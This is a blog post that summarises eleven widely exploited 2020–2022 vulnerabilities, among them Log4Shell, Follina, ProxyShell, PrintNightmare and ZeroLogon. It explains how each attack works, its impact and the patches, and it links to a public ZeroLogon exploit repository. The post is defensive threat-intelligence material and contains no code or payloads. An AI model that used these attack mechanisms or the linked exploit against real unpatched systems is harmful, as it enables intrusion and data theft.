Open in app

Sign in

Write

Sign in

Top 11 exploited vulnerabilities for initial access and compromise in ‘22

Winter_Soldiers
12 min readDec 3, 2022

--

When one door closes, another one opens;”. This holds true for security defenders and threat actors alike, especially with the myriad of vulnerabilities and exploits that exist out in the wild. Over the past few years, threat actors have been drastically changing their TTPs, in-line with the number of new vulnerabilities being discovered. But even with the influx of new ones, we can still observe quite a number of exploits of yesteryears being used in breaches today. These wide variety of vulnerabilities are exploited by threat actors to achieve results that range from privilege escalation and path traversal to security bypasses and remote code execution!

In this article, we discuss the top critical vulnerabilities that have been exploited in the past few months by threat actors to ensure gaining initial access and compromise, based on some open-source research data. The vulnerabilities have been listed out in reverse chronological order of the dates on which they are published by NVD.

1. Google Chrome Vulnerability (CVE-2022–3723)

The high-severity flaw (CVE-2022–3723) is a type confusion bug in the Chrome V8 Javascript engine which was discovered and reported to Google by analysts at Avast.

Type: Remote code execution (RCE)
How the attack works: Type confusion in V8 in Google Chrome prior to 107.0.5304.87 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)
Impact: If the vulnerability is successfully exploited attacker arbitrary code execution.
Affected product: Google Chrome version prior to 107.0.5304.87/.88 for Windows, version prior to 107.0.5304.87 for Mac and Linux
Mitigation: Update Chrome browser to the latest version

2. MSDT Follina Vulnerability (CVE-2022–30190)

This is a vulnerability in Microsoft Support Diagnostic Tool (MSDT), which could be exploited to execute arbitrary code when MSDT is called using URI protocol. The URI protocol ms-msdt:/ could be invoked from the malicious word document or link , which when opened by the victim user , allows malicious code to execute on the target machine with the privileges of the calling application.A Word document exploiting this vulnerability (CVE- 2022–30190) was first found to be submitted to VirusTotal on 27th May 2022 from Belarus with the file name 05–2022–0438.doc. However, the number 0438 turns out to be the Area code of the region Follina in Italy and hence the name. The document was not found to be connected to Italy in any other way.

Type: Remote code execution (RCE)
How the attack works: Follina requires user interaction to achieve payload execution, however this can be gained by tricking a victim user into opening a malicious link or payload delivered via social media or email. On clicking the document, a malicious HTML script is rendered, leading to arbitrary code execution on the affected system.

Impact: An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application. The attacker can then install programs, view, change, or delete data, or create new accounts in the context allowed by the user’s rights
Affected Product: Microsoft Support Diagnostic Tool (MSDT)
Mitigation: Patch the affected Windows OS to the latest version available

3. Open SSL Vulnerability (CVE-2022–0778)

OpenSSL is a very popular library, widely used by many organizations and software applications requiring secure communications. The vulnerability lies in OpenSSL’s implementation of the Tonelli-Shanks algorithm, used to find the square roots of numbers in the elliptic curve cryptography at the heart of the encryption library.
Type: Denial of Service (DOS)
How the attack works: This vulnerability occurs when instead of a prime number, a composite number is passed to the Tonelli-Shanks algorithm. This results in a computational problem like integer factorization. The BN_mod_sqrt() function, which computes a modular square root, contains a bug that can cause it to loop forever for non-prime moduli. Internally this function is used when parsing certificates that contain elliptic curve public keys in compressed form or explicit elliptic curve parameters with a base point encoded in compressed form. It is possible to trigger the infinite loop by crafting a certificate that has invalid explicit curve parameters. Since certificate parsing happens prior to verification of the certificate signature, any process that parses an externally supplied certificate may thus be subject to a denial of service attack. The infinite loop can also be reached when parsing crafted private keys as they can contain explicit elliptic curve parameters. Thus vulnerable situations include:
— TLS clients consuming server certificates
— TLS servers consuming client certificates
— Hosting providers taking certificates or private keys from customers
— Certificate authorities parsing certification requests from subscribers
— Anything else which parses ASN.1 elliptic curve parameters.
— Also any other applications that use the BN_mod_sqrt() where the attacker can control the parameter values are vulnerable to this DoS issue.

In the OpenSSL 1.0.2 version the public key is not parsed during initial parsing of the certificate which makes it slightly harder to trigger the infinite loop. However any operation which requires the public key from the certificate will trigger the infinite loop. In particular the attacker can use a self-signed certificate to trigger the loop during verification of the certificate signature.

Impact: OpenSSL vulnerability, CVE-2022–0778, can use specially crafted certificates to cause a Denial of Service (DoS). The vulnerability affects both clients and servers
Affected product: OpenSSL versions 1.0.2, 1.1.1 and 3.0. It was addressed in the releases of 1.1.1n and 3.0.2 on the 15th March 2022. Fixed in OpenSSL 3.0.2 (Affected 3.0.0,3.0.1).
Mitigation: Issue is fixed in OpenSSL 1.1.1n (Affected 1.1.1–1.1.1m). Fixed in OpenSSL 1.0.2zd (Affected 1.0.2–1.0.2zc). Update SSL to the latest version.

4. Log4shell (CVE-2021–44228)

This vulnerability affects Apache’s Log4j library, an open-source logging framework, and was released as a zero-day vulnerability in December 2021. A successful Log4Shell exploration can lead to remote code execution. Log4Shell is a Java Naming and Directory Interface™ (JNDI) injection vulnerability.

Type: Remote code execution (RCE)
How the attack works: The vulnerability can be exploited by submitting a specially crafted JNDI request (payload) to a vulnerable system that causes that system to execute arbitrary code. The request allows a threat actor to take full control of the system.

Impact: Apart from conducting RCE, attackers can steal information, launch ransomware, or conduct other malicious activity.
Affected Product: Apache Log4j is the affected product with over 400,000 downloads from its GitHub project. Log4j2 has been used across a variety of products and services, from Apache products like Struts, Solr, and Flink to security products like ElasticSearch, Logstash, Kafka, and even Minecraft servers.
Mitigation: Upgrading Log4j assets and affected products to the latest safe version 2.17 and above.

5. PetitPotam (CVE-2021–36942)

The PetitPotam flaw is present in Windows servers, where the active directory certificate services (AD CS) are not configured with protection against NTLM relay attacks. An adversary can take control over a domain controller by forcing it to authenticate to an NTML relay server controlled by him/her. It then intercepts traffic and impersonates clients.

Type: Elevation of privilege
How the attack works: PetitPotam works by exploiting Microsoft’s Encrypting File System Remote Protocol (MS-EFSRPC) to trick one Windows host into authenticating to another over LSARPC on TCP port 445. Successful exploitation means that the target server will perform NTLM authentication to an arbitrary server, allowing a threat actor who is able to leverage the technique to deploy ransomware or create new policies.
According to Microsoft’s ADV210003 advisory, Windows users are potentially vulnerable to this attack if they are using Active Directory Certificate Services (AD CS) with any of the following services:
-Certificate Authority Web Enrollment
-Certificate Enrollment Web Service

Impact: The attacker uses Microsoft’s Encrypting File System Remote Protocol (MS-EFSRPC) to connect to a server, hijack the authentication session, and manipulate the results such that the server then believes the attacker has a legitimate right to access it. Using the authentication, the attacker can then drop tools such as a remote shell on the server and then leverage other exploits using that remote shell to elevate their own privileges.
Affected Product: Microsoft Active Directory Certificate Services (AD CS)
Mitigation: To prevent NTLM Relay Attacks on networks with NTLM enabled, domain administrators must ensure that services that permit NTLM authentication make use of protections such as Extended Protection for Authentication (EPA) or signing features such as SMB signing. Refer KB5005413

6. Windows Print Spooler vulnerability ( CVE-2021–34527, CVE-2021–1675, CVE-2022–22718)

The Print Spooler remote code execution vulnerability takes advantage of the RpcAddPrinterDriver function call in the Print Spooler service that allows clients to add arbitrary DLL files as printer drivers and load them as SYSTEM (the spooler service context).

Type: Remote Code Execution
How the attack works: TheRpcAddPrinterDriver function in the Print Spooler service is designed to allow users to update printers remotely. However, a logical flaw in working allows any user to inject their own unsigned DLL into the process, bypassing authentication or validation of the file.
Impact: Attackers exploiting the flaw can potentially create new user accounts, modify data and install programs. The vulnerability was dubbed PrintNightmare due to its potential of affecting millions of servers, computers, and laptops running Windows across the globe.
Affected Product: Microsoft Windows Print Spooler service
Mitigation: Patch all affected servers to the latest version

7. ProxyShell (CVE-2021–34523, CVE-2021–34473, CVE-2021–31207)

These vulnerabilities lie in the Microsoft Client Access Service (CAS) which typically runs on port 443 in Microsoft Internet Information Services (IIS) (e.g., Microsoft’s web server). CAS is commonly exposed to the internet to enable users to access their email via mobile devices and web browsers. This exposure has led to widespread exploitation by threat actors who are commonly deploying web shells to remotely execute arbitrary code on compromised devices.

Type: Elevation of privilege (CVE-2021–34523), RCE (CVE-2021–34473), Security feature bypass (CVE-2021–31207)
How the attack works: Attackers exploit ProxyShell to install a backdoor for later access and post-exploitation. ProxyShell comprises three separate vulnerabilities used as part of a single attack chain:

  • CVE-2021–34473 is pre-auth path confusion vulnerability to bypass access control.
  • CVE-2021–34523 is privilege elevation vulnerability in the Exchange PowerShell backend.
  • CVE-2021–31207 is post-auth remote code execution via arbitrary file write.

Impact: Successful exploitation of these vulnerabilities in combination enables a remote adversary to execute arbitrary code, establish persistence and take full control of vulnerable Microsoft Exchange email servers.
Affected Products: Exchange Server 2013, Exchange Server 2016, Exchange Server 2019
Mitigation: Update Exchange servers to the latest released patches. At a minimum, ensure that July 2021 updates are installed.
CVE-2021–34473 patched in KB5001779, released in April 2021
CVE-2021–34523 patched in KB5001779, released in April 2021
CVE-2021–31207 patched in KB5003435, released in May 2021

8. Proxy Logon (CVE-2021–26855, CVE-2021–26858, CVE-2021–26857, CVE-2021–27065)

The vulnerability was named Proxy Logon as it can be used for exploiting the proxy architecture and login mechanism in the Exchange Server. Proxy logon vulnerability is related to untrusted connections to the Exchange server on port 443 and this can be exploited without user interaction. It allows attackers to bypass authentication and impersonate an administrator. Adversaries exploited ProxyLogon to drop web shells on vulnerable systems, where the MSExchange mailbox replication service was used in writing an ASPX file to disk.

Type: Remote code execution (RCE)
How the attack works: Adversaries exploited ProxyLogon to drop web shells on vulnerable systems, where the msexchange mailbox replication service was used in writing an ASPX file to disk. CVE-2021–26855, also known as “ProxyLogon,” is a server-side request forgery flaw that can be chained together with CVE-2021–27065, a post-authentication arbitrary file write bug, for an attacker to achieve remote code execution.
Impact: Successful exploitation of these vulnerabilities in combination allows an unauthenticated attacker to execute arbitrary code on vulnerable Exchange Servers. This enables the threat actor to gain persistence to access to files, mailboxes and even credentials stored on the servers. Apart from persistence it also opens door for lateral movement and remote manipulation.
Affected Products:
Exchange Server 2019 < 15.02.0792.010
Exchange Server 2019 < 15.02.0721.013
Exchange Server 2016 < 15.01.2106.013
Exchange Server 2013 < 15.00.1497.012
Mitigation: Microsoft released out-of-band patches for Exchange Server 2013, 2016, and 2019, as well as a defense-in-depth update for Exchange Server 2010 because that version is only vulnerable to CVE-2021–26857.

9. Confluence Server Webwork OGNL injection (CVE-2021–26084)

An OGNL(Object-Graph Navigation Language) injection vulnerability allows an unauthenticated adversary to execute arbitrary code on a Confluence Server or Data Center instance.

Type: Arbitrary code execution
How the attack works: The vulnerability allows unauthenticated actors to execute arbitrary code on Confluence Server or Data Center installations.
An unauthenticated user who is not having administrative privileges can remotely access the vulnerable endpoints on these applications if ‘Allow people to sign up to create their account’ is enabled. Check ‘COG > User Management > User Signup Options’ on the affected software to see if this is enabled.
Impact: Unauthenticated actors can execute arbitrary code on vulnerable systems. Threat actors target this vulnerability whose goal could be to download a malicious payload that would install a backdoor or miner in a user’s network.
Affected Product: Confluence server affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.
Mitigation: Patch Confluencer servers to the latest version

10. VMware vSphere client vulnerability (CVE-2021–21972)

The vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. An adversary with network access to port 443 can exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server.

Type: Remote code execution (RCE)
How the attack works: Proof of Concept code to exploit the vulnerability has been published online. These vulnerabilities allowed non-authorized clients to execute arbitrary commands and send requests on behalf of the targeted server via various protocols: Unauthorized file upload leading to remote code execution (RCE) (CVE-2021- 21972), an unauthorized server-side request forgery (SSRF) vulnerabilities (CVE-2021–21973)

Impact: The attacker can gain remote code execution
Affected Products: VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).
Mitigation: Patching the affected servers.For more details refer this VMWare report

11. ZeroLogon (CVE-2020–1472)

Zerologon is a vulnerability in the cryptographic flow of Microsoft’s Netlogon process that allows an attack against Microsoft Active Directory domain controllers. The initialization vector (IV) is set to all zeros all the time, while an IV should always be a random number. Taking advantage of this vulnerability, a threat actor can connect with the active directory netlogon remote protocol (MS-NRPC) and log on using NTLM.

Type: Elevation of privilege
How the attack works: There are scripts available that can be used to exploit this vulnerability. https://github.com/dirkjanm/CVE-2020-1472 by @dirkjan includes an actual exploit to change (and revert) the domain controller password.

Impact: Zerologon allows attackers to impersonate any computer, including the root domain controller.
Affected Product: Microsoft Netlogon Remote Protocol (MS-NRPC)on AD servers
Mitigation: Patch all AD servers (2008 R2 and above)

General steps for mitigations

  1. Update software, operating systems, applications, and firmware on IT network assets in a timely manner. Prioritize patching known exploited vulnerabilities
  2. Use a centralized patch management system.
  3. Replace end-of-life software i.e., software that is no longer supported by the vendor
  4. Enforce multifactor authentication (MFA) for all users, without exception.
  5. Enforce MFA on all VPN connections. If MFA is unavailable, require employees engaging in remote work to use strong passwords.
  6. Regularly review, validate, or remove privileged accounts (annually at a minimum).
  7. Configure access control under the concept of least privilege principle
  8. Properly configure and secure internet-facing network devices, disable unused or unnecessary network ports and protocols, encrypt network traffic, and disable unused network services and devices. Implement proper hardening measures
  9. Segment networks to limit or block lateral movement by controlling access to applications, devices, and databases. Use private virtual local area networks.
  10. Continuously monitor the attack surface and investigate abnormal activity that may indicate lateral movement of a threat actor or malware
  11. Reduce third-party applications and unique system/application builds; provide exceptions only if required to support business critical functions. Implement application allow listing.

Disclaimer
The information in this article is based on research data from various open source forums (which have been listed in the references section)

Reference sources:

https://news.sophos.com/en-us
https://cve.mitre.org/
https://nvd.nist.gov/vuln/detail/
https://www.cisa.gov/uscert/ncas/alerts/aa22-117a
https://www.crowdstrike.com/blog/cve-2020-1472-zerologon-security-advisory/
https://resources.infosecinstitute.com/topic/most-dangerous-vulnerabilities-exploited/
https://www.semperis.com/blog/what-you-need-to-know-about-printnightmare-the-critical-windows-print-spooler-vulnerability/
https://www.sentinelone.com/blog/enterprise-security-essentials-top-15-most-routinely-exploited-vulnerabilities-2022/
https://www.trellix.com/en-us/about/newsroom/stories/research/countering-follina-attack-with-network-security-platforms-advanced-detection-features.html

Vulnerability
Exploitation
Cybersecurity
Initial Access
Compromise

--

--

Winter_Soldiers

Written by Winter_Soldiers

91 Followers

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams